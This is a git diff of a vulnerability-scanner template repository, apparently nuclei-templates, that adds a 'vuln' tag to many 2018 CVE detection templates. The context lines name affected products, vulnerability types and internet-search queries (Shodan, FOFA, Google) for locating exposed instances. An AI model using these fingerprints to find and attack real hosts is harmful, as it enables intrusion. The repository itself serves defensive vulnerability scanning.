d4ded97950b..521e0125034 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -28,7 +28,7 @@ info: vendor: gvectors product: wpforo_forum framework: wordpress - tags: cve,cve2018,wordpress,xss,wp-plugin,gvectors + tags: cve,cve2018,wordpress,xss,wp-plugin,gvectors,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 0ca5e5ec26a..cdb0803cbce 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -33,7 +33,7 @@ info: - http.title:"apache tomcat" fofa-query: title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve2018,cve,apache,tomcat,httpd,mod-jk,vkev + tags: cve2018,cve,apache,tomcat,httpd,mod-jk,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index eb516b900eb..e0a34b191ca 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -37,7 +37,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2018,packetstorm,apache,rce,struts,kev,vkev + tags: cve,cve2018,packetstorm,apache,rce,struts,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index d68faca13c6..890e485b379 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -37,7 +37,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve,cve2018,packetstorm,tomcat,redirect,apache + tags: cve,cve2018,packetstorm,tomcat,redirect,apache,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 1163f7afb64..711ab7f20cc 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: eaton product: intelligent_power_manager - tags: cve,cve2018,edb,lfi,eaton,vkev + tags: cve,cve2018,edb,lfi,eaton,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index eff8a4a6881..fea2669df39 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: schools_alert_management_script_project product: schools_alert_management_script - tags: cve,cve2018,lfi,edb,schools_alert_management_script_project + tags: cve,cve2018,lfi,edb,schools_alert_management_script_project,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 2911ec6c67e..acc12004160 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -30,7 +30,7 @@ info: max-request: 1 vendor: dell product: emc_idrac7 - tags: cve2018,cve,dell,injection,rce,vkev + tags: cve2018,cve,dell,injection,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 5c0e2bbf8be..f8959587444 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: oecms_project product: oecms - tags: cve2018,cve,xss,edb,oecms_project + tags: cve2018,cve,xss,edb,oecms_project,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml index 823ef323cbc..b393ab42165 100644 --- a/http/cves/2018/CVE-2018-1217.yaml +++ b/http/cves/2018/CVE-2018-1217.yaml @@ -23,7 +23,7 @@ info: vendor: dell product: emc_avamar,emc_integrated_data_protection_appliance shodan-query: title:"AVAMAR" - tags: cve,cve2018,dell,avamar,vkev + tags: cve,cve2018,dell,avamar,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 3358161b1b5..fbc38ca24f6 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"seagate nas - seagate" fofa-query: title="seagate nas - seagate" google-query: intitle:"seagate nas - seagate" - tags: cve,cve2018,seagate,nasos,disclosure,unauth,vkev + tags: cve,cve2018,seagate,nasos,disclosure,unauth,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 8e8eb781d46..afc2e884e24 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.title:"seagate nas - seagate" fofa-query: title="seagate nas - seagate" google-query: intitle:"seagate nas - seagate" - tags: cve2018,cve,redirect,seagate,nasos + tags: cve2018,cve,redirect,seagate,nasos,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-12455.yaml b/http/cves/2018/CVE-2018-12455.yaml index eabf9241982..212be6b4d36 100644 --- a/http/cves/2018/CVE-2018-12455.yaml +++ b/http/cves/2018/CVE-2018-12455.yaml @@ -26,7 +26,7 @@ info: product: nplug shodan-query: html:"NPLUG" fofa-query: title="NPLUG" - tags: cve,cve2018,intelbras,auth-bypass,iot + tags: cve,cve2018,intelbras,auth-bypass,iot,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 76e00402992..a056a27f2ad 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -36,7 +36,7 @@ info: - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi,vkev + tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 619c92c709c..dbe1f9f256c 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: circontrol product: circarlife_scada - tags: cve,cve2018,scada,circontrol,circarlife,logs,edb + tags: cve,cve2018,scada,circontrol,circarlife,logs,edb,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 804a12c7268..ad6d76032cb 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: sv3c product: h.264_poe_ip_camera_firmware - tags: cve,cve2018,redirect,sv3c,camera,iot + tags: cve,cve2018,redirect,sv3c,camera,iot,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 62c6cb378ed..59252ca3a25 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: vmware product: spring_framework - tags: cve,cve2018,spring,lfi,traversal,vmware + tags: cve,cve2018,spring,lfi,traversal,vmware,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 67760663386..d468e84cb95 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -33,7 +33,7 @@ info: max-request: 2 vendor: pivotal_software product: spring_data_commons - tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software,vkev + tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index ed2c4be0575..83cd4327006 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="Webgrind" - app="webgrind" - tags: cve,cve2018,lfi,webgrind,webgrind_project + tags: cve,cve2018,lfi,webgrind,webgrind_project,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 77d7b41b255..831441f6af3 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: zohocorp product: firewall_analyzer - tags: cve,cve2018,zoho,xss,manageengine,packetstorm,zohocorp,vkev + tags: cve,cve2018,zoho,xss,manageengine,packetstorm,zohocorp,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 7701a497109..8cd21424956 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: apache product: tika - tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive,vkev + tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive,vkev,vuln http: - method: PUT diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 510f64d8236..2364f729236 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash=945408572 - tags: cve2018,cve,fortios,lfi,kev,fortinet,vkev + tags: cve2018,cve,fortios,lfi,kev,fortinet,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index d7bf9455009..69fcf6a4e10 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash=945408572 - tags: cve,cve2018,fortios,xss,fortinet + tags: cve,cve2018,fortios,xss,fortinet,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index a2f63de5870..79b6589266e 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zeta-producer product: zeta_producer - tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer + tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index ff3a51c777b..b42f8db070b 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: cve,cve2018,xss,zimbra,synacor + tags: cve,cve2018,xss,zimbra,synacor,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index d99dc92f10e..f3058a43c6a 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: velotismart_project product: velotismart_wifi_firmware - tags: cve2018,cve,edb,lfi,camera,iot,velotismart_project + tags: cve2018,cve,edb,lfi,camera,iot,velotismart_project,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 57d24f56248..cda67f54f70 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: goodoldweb product: orange_forum - tags: cve2018,cve,redirect,orangeforum,oss,seclists,goodoldweb + tags: cve2018,cve,redirect,orangeforum,oss,seclists,goodoldweb,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 33a657ae046..997d84c135a 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -29,7 +29,7 @@ info: vendor: djangoproject product: django shodan-query: cpe:"cpe:2.3:a:djangoproject:django" - tags: cve,cve2018,django,redirect,djangoproject + tags: cve,cve2018,django,redirect,djangoproject,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 16f93682845..096fa431257 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: tecrail product: responsive_filemanager - tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail + tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail,vuln http: - method: POST diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 0d848a670fb..a9cd9e8c1dc 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"git repository browser" fofa-query: title="git repository browser" google-query: intitle:"git repository browser" - tags: cve,cve2018,cgit,lfi,cgit_project,vkev + tags: cve,cve2018,cgit,lfi,cgit_project,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 7eb515bed57..02949bb92bf 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: loytec product: lgate-902 - tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss + tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index cff4cc84666..16f7cc11190 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -33,7 +33,7 @@ info: - http.html:"LGATE-902" - http.html:"lgate-902" fofa-query: body="lgate-902" - tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss,vkev + tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 6cfd5fcd7d4..8416140ac2b 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: polarisft product: intellect_core_banking - tags: cve,cve2018,redirect,polarisft,intellect + tags: cve,cve2018,redirect,polarisft,intellect,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-14933.yaml b/http/cves/2018/CVE-2018-14933.yaml index adda5fd801a..a942e59c5fa 100644 --- a/http/cves/2018/CVE-2018-14933.yaml +++ b/http/cves/2018/CVE-2018-14933.yaml @@ -24,7 +24,7 @@ info: product: nvrmini_firmware shodan-query: title:"NUUO" fofa-query: title="NUUO" - tags: cve,cve2018,nuuo,rce,kev,vkev + tags: cve,cve2018,nuuo,rce,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index a385f22b3b3..cfff46a09b9 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: ericssonlg product: ipecs_nms - tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg,vkev + tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 7444061dde6..b906f15ac3d 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: central_wifimanager - tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast,vkev + tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index c8d9a3ec339..e5d2f33e6ae 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: tecrail product: responsive_filemanager - tags: cve,cve2018,lfi,edb,seclists,tecrail + tags: cve,cve2018,lfi,edb,seclists,tecrail,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index b0e6062819c..0ab38e1308a 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"web viewer for samsung dvr" fofa-query: title="web viewer for samsung dvr" google-query: intitle:"web viewer for samsung dvr" - tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr + tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-15811.yaml b/http/cves/2018/CVE-2018-15811.yaml index 3d4b03381bc..91c1cb578c4 100644 --- a/http/cves/2018/CVE-2018-15811.yaml +++ b/http/cves/2018/CVE-2018-15811.yaml @@ -29,7 +29,7 @@ info: product: dotnetnuke fofa-query: app="dotnetnuke" verified: true - tags: cve,cve2018,dotnetnuke,crypto,deserialization,rce,kev,dnnsoftware,vkev + tags: cve,cve2018,dotnetnuke,crypto,deserialization,rce,kev,dnnsoftware,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index ec1ec648f11..f4e2e4785ec 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -30,7 +30,7 @@ info: - title:"Login - Jorani" - http.favicon.hash:-2032163853 fofa-query: icon_hash=-2032163853 - tags: cve,cve2018,jorani,xss,jorani_project + tags: cve,cve2018,jorani,xss,jorani_project,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 5350eda4e8d..f9f8b3a39cc 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -36,7 +36,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive,vkev + tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index ea166913d49..405a05c5599 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: endress product: wirelesshart_fieldgate_swg70_firmware - tags: cve,cve2018,iot,lfi,edb,endress,vkev + tags: cve,cve2018,iot,lfi,edb,endress,vkev,vuln http: - method: POST diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 6010fd2911f..308a5c86741 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cybrotech product: cybrohttpserver - tags: cve2018,cve,lfi,packetstorm,cybrotech + tags: cve2018,cve,lfi,packetstorm,cybrotech,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 4f3d78d2d73..360a7fae7f1 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -33,7 +33,7 @@ info: - http.title:"bibliopac" fofa-query: title="bibliopac" google-query: intitle:"bibliopac" - tags: cve,cve2018,xss,bibliopac,bibliosoft + tags: cve,cve2018,xss,bibliopac,bibliosoft,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 93623729a48..1384933c91e 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -31,7 +31,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: body="/wp-content/plugins/gift-voucher/" - tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen,vkev + tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index dd19860cc45..d3118790c20 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jpcert product: logontracer - tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert,vkev + tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 8603c98c9c3..c48f9bd25f0 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -26,7 +26,7 @@ info: vendor: wechat_brodcast_project product: wechat_brodcast framework: wordpress - tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project + tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 82d0b4e801c..fa0f5547c5b 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: lg product: supersign_cms - tags: cve,cve2018,lfi,supersign,edb,lg + tags: cve,cve2018,lfi,supersign,edb,lg,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 4cc9ebb9ace..8bc5e30dba5 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -29,7 +29,7 @@ info: vendor: localize_my_post_project product: localize_my_post framework: wordpress - tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project + tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml index 4d51a41664c..fcb761200ad 100644 --- a/http/cves/2018/CVE-2018-16341.yaml +++ b/http/cves/2018/CVE-2018-16341.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-16341 metadata: max-request: 1 - tags: cve,cve2018,nuxeo,ssti,rce,bypass + tags: cve,cve2018,nuxeo,ssti,rce,bypass,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 72759c2f03d..0c107394265 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: circontrol product: circarlife_scada - tags: cve,cve2018,circarlife,scada,iot,disclosure,edb,circontrol + tags: cve,cve2018,circarlife,scada,iot,disclosure,edb,circontrol,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index cffa787ed80..8dafbe1f1a1 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: circontrol product: circarlife_scada - tags: cve,cve2018,scada,plc,iot,disclosure,edb,circarlife,circontrol,vkev + tags: cve,cve2018,scada,plc,iot,disclosure,edb,circarlife,circontrol,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 8bc431b5ae1..0e093a58093 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: circontrol product: circarlife_scada - tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol + tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 816e5cd3d36..13c14fd7150 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: nih product: ncbi_toolbox - tags: cve,cve2018,ncbi,lfi,nih + tags: cve,cve2018,ncbi,lfi,nih,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index cd662635a74..53f9f1cd4cc 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -29,7 +29,7 @@ info: product: eventum shodan-query: http.favicon.hash:305412257 fofa-query: icon_hash=305412257 - tags: cve,cve2018,redirect,eventum,oss,eventum_project + tags: cve,cve2018,redirect,eventum,oss,eventum_project,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 886fe3d3f95..db6223d3c5a 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"fuel cms" fofa-query: title="fuel cms" google-query: intitle:"fuel cms" - tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio,vkev + tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 8810c67a518..751ddddb618 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: rubedo_project product: rubedo - tags: cve2018,cve,rubedo,lfi,edb,rubedo_project,vkev + tags: cve2018,cve,rubedo,lfi,edb,rubedo_project,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 7a163596091..6f6a268445d 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -29,7 +29,7 @@ info: product: monstra shodan-query: http.favicon.hash:419828698 fofa-query: icon_hash=419828698 - tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss + tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 887648c99af..1213a4eb7d9 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -31,7 +31,7 @@ info: product: my_cloud_wdbctl0020hwt_firmware shodan-query: http.favicon.hash:-1074357885 fofa-query: icon_hash=-1074357885 - tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital + tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-17173.yaml b/http/cves/2018/CVE-2018-17173.yaml index 11dba374c63..6c69896fae9 100644 --- a/http/cves/2018/CVE-2018-17173.yaml +++ b/http/cves/2018/CVE-2018-17173.yaml @@ -24,7 +24,7 @@ info: vendor: lg product: supersign_cms fofa-query: title="LG SuperSign" - tags: cve,cve2018,lg,supersign-cms,rce,vkev + tags: cve,cve2018,lg,supersign-cms,rce,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-17207.yaml b/http/cves/2018/CVE-2018-17207.yaml index 024ce134f12..af5e586b225 100644 --- a/http/cves/2018/CVE-2018-17207.yaml +++ b/http/cves/2018/CVE-2018-17207.yaml @@ -25,7 +25,7 @@ info: max-request: 1 publicwww-query: "/wp-content/plugins/duplicator" google-query: inurl:"/wp-content/plugins/duplicator" - tags: cve,cve2018,wordpress,duplicator,rce,vkev,passive + tags: cve,cve2018,wordpress,duplicator,rce,vkev,passive,vuln # Uncomment to attempt RCE, but note that it modifies database details, potentially causing the website to not function properly. # variables: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 68d8e3c267a..9def64117f9 100644 --- 